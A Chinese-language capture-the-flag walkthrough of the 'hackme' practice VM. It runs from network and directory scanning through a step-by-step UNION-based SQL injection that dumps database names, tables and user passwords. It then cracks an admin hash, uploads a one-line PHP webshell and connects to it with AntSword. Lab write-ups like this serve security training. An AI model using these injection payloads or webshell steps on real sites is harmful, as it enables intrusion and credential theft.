hackme靶机渗透测试
环境搭建
Vulhub中下载镜像文件
虚拟机中打开安装好的镜像文件,同时打开kali
信息搜集
arp-scan -l 扫描该此时网段下存活的主机和ip
发现存在 192.168.217.162 这个IP
扫描一下该IP存在的端口
发现有22端口和80端口,对应的协议分别为ssh http
访问一下80端口
发现是一个登录页面
尝试用弱口令登录一下
出现错误
我们可以利用dirsearch/dirb来继续扫描一下这个IP
出现了以下的子域名,我们访问一下
这是一个注册页面
尝试注册一下
注册之后登录进去
翻译一下是这个意思
随便输入个东西进去 发现没有变化
我们想到还有一个/uploads/还没看,打开看一下
点进去看一下
是一张图片 我们看一下网页源代码 发现没法打开
我们换个思路
在welcome.php页面点击search,会出现下面内容
这应该是这个内部存在的数据
尝试sql注入一下
Linux OS' and 1=1#
Linux OS' and 1=2#
说明存在sql注入
进行sql注入
判断回显
Linux OS’ order by 3#
Linux OS’ order by 4#
说明字段数是3
-1’ union select 1,2,3#
-1’ union select database(),2,3#
查到数据库名称为webapphacking
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#
得出表名为 books,users
-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
得出所有的字段为
USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,user,password,name,address
查询密码
-1' union select group_concat(user),group_concat(pasword),3 from users#
这里有一个superadmin 把这个的密码MD5解码一下
密码为:Uncrackable
账户为superadmin
登录一下
进入发现了一个可以上传文件的按钮
此时我们可以写入一个shell.php文件,该文件包含一句话木马
访问shell.php
用蚁剑来进行连接
此时说明连接成功了